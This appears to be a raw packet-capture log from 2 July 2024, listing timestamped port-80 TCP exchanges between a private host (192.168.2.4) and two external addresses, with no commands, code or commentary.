                                            Jul 2, 2024 08:26:30.462007999 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.462014914 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.462018967 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.462032080 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.462038994 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.462043047 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.462054968 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.462060928 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.462066889 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.462074995 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.462076902 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.462089062 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.462095976 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.462119102 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.897805929 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.900458097 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.903239012 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.905267000 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:31.759093046 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:31.759190083 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:31.815326929 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:31.820664883 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:31.994278908 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:31.994301081 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:31.994313002 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:31.994425058 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:31.994463921 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:31.998675108 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:32.005249023 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:32.185550928 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:32.185669899 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:32.196485996 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:32.201318026 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:32.898799896 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:32.898905993 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:32.960412025 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:32.965410948 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:33.698004961 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:33.698066950 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:33.700815916 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:33.705667019 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:33.705733061 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:33.705861092 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:33.710568905 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.438688993 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.438714027 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.438730955 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.438812971 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.438824892 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.438836098 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.438847065 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.438858986 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.438872099 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.438872099 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.438873053 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.438903093 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.438910007 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.439019918 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.439033031 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.439055920 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.439080000 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.443813086 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.443860054 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.443917036 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.443929911 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.443958044 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.443975925 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.565985918 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.566006899 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.566020012 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.566032887 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.566050053 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.566080093 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.566160917 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.566205978 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.566206932 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.566220999 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.566246986 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.566257000 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.566379070 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.566391945 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.566405058 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.566416979 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.566432953 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.566448927 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.567424059 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.567470074 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.567487955 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.567500114 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.567524910 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.567534924 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.567615986 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.567629099 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.567640066 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.567651033 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.567661047 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.567682028 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.568097115 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.568141937 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.568149090 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.568161011 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.568183899 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.568196058 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.568257093 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.568269014 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.568281889 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.568294048 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.568305969 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.568325043 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.569165945 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.569222927 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.571818113 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.571866989 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.571938038 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.571979046 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.692127943 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.692145109 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.692157030 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.692245007 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.692256927 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.692267895 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.692280054 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.692279100 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.692279100 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.692291975 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.692301989 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.692331076 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.692331076 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.692367077 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.692378998 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.692390919 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.692401886 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.692401886 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.692416906 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.692419052 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.692430973 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.692445993 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.692473888 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.692640066 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.692687035 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.692696095 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.692707062 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.692734957 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.692747116 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.692816019 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.692852974 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.692887068 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.692898989 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.692926884 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.692936897 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.693064928 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.693075895 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.693089008 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.693100929 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.693099976 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.693115950 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.693136930 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.693216085 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.693228006 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.693262100 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.693285942 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.693592072 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.693645000 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.693651915 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.693656921 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.693685055 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.693697929 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.693792105 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.693804026 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.693815947 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.693826914 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.693834066 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.693859100 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.693928003 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.693968058 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.694015026 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.694027901 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.694039106 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.694055080 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.694067955 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.694670916 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.694683075 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.694694042 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.694721937 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.694735050 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.694864035 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.694876909 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.694917917 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.694928885 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.694956064 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.694968939 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.694979906 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.694991112 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.694996119 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.695003986 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.695010900 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.695024014 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.695025921 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.695059061 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.695080996 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.789347887 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.789462090 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.819276094 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.819384098 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.819421053 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.819432974 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.819443941 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.819456100 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.819468021 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.819474936 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.819525957 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.819566965 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.819578886 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.819590092 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.819602013 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.819605112 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.819638968 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.819746017 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.819786072 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.819813967 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.819852114 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.820111990 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.820123911 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.820135117 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.820146084 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.820163012 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.820183992 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.820184946 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.820199013 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.820209980 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.820219994 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.820229053 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.820240021 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.820255041 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.820259094 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.820270061 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.820293903 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.820302010 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.820930004 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.820941925 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.820952892 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.820983887 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.821018934 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.821079016 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.821090937 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.821101904 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.821114063 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.821120977 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.821134090 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.821161032 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.821229935 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.821242094 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.821269989 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.821281910 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.821387053 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.821405888 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.821415901 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.821424961 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.821429968 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.821439981 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.821440935 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.821454048 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.821459055 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.821465969 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.821472883 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.821479082 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.821490049 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.821506023 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.821506977 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.821517944 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.821526051 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.821537971 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.821541071 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.821551085 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.821563005 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.821573019 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.821599007 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.823016882 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.823029995 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.823043108 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.823052883 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.823065042 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.823070049 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.823076963 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.823087931 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.823098898 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.823100090 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.823112965 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.823122978 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.823134899 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.823136091 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.823147058 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.823159933 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.823160887 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.823170900 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.823174953 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.823185921 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.823199034 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.823206902 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.823213100 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.823240995 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.823287964 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.823299885 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.823323965 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.823353052 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.823441029 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.823481083 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.823576927 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.823616982 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.824888945 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.824945927 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.825038910 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.825052977 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.825090885 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.825110912 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.825329065 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.825341940 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.825355053 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.825377941 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.825400114 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.826210976 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.826225996 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.826266050 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.826292038 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.913033962 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.913064957 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.913077116 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.913122892 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.913129091 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.913136959 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.913142920 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.913197994 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.913223028 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.913243055 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.913266897 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.913304090 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.913338900 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.913352013 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.913389921 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.913479090 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.913491011 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.913502932 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.913515091 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.913523912 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.913530111 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.913546085 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.913568974 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.913621902 CEST806388177.91.77.81192.168.2.4
